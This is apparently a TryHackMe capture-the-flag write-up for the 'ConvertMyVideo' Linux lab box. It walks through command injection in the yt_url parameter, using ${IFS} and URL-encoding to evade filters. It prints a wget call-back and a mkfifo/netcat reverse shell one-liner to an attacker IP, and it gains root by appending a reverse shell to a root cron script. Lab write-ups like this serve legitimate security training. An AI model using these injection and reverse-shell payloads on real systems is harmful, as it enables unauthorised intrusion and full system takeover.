THM | ConvertMyVideo

This is a Linux box. You can find it here.

NMAP

IP:10.10.185.77

start burp

we found an error in the response

we can try for command injection

`whoami`

we get www-data

Let's see if we can get a hit on our machine using wget, more on ${IFS} refer this

using yt_url=`wget${IFS}http://10.9.0.78/`

we get the hit

Let's try for a reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

replace " " with ${IFS} and "&" with %26

we get the shell but the connection is lost soon

let's try uploading the script and then executing it

now let's execute it

found flag.txt

copy LinEnum.sh to the box and run it

we found cron is running

Let's copy pspy64 to the box and run

I found the cron script clean.sh

we can append the reverse shell and since it is triggered by the root we might get root shell

and wait for it to trigger

and we are the root

Last updated 1 year ago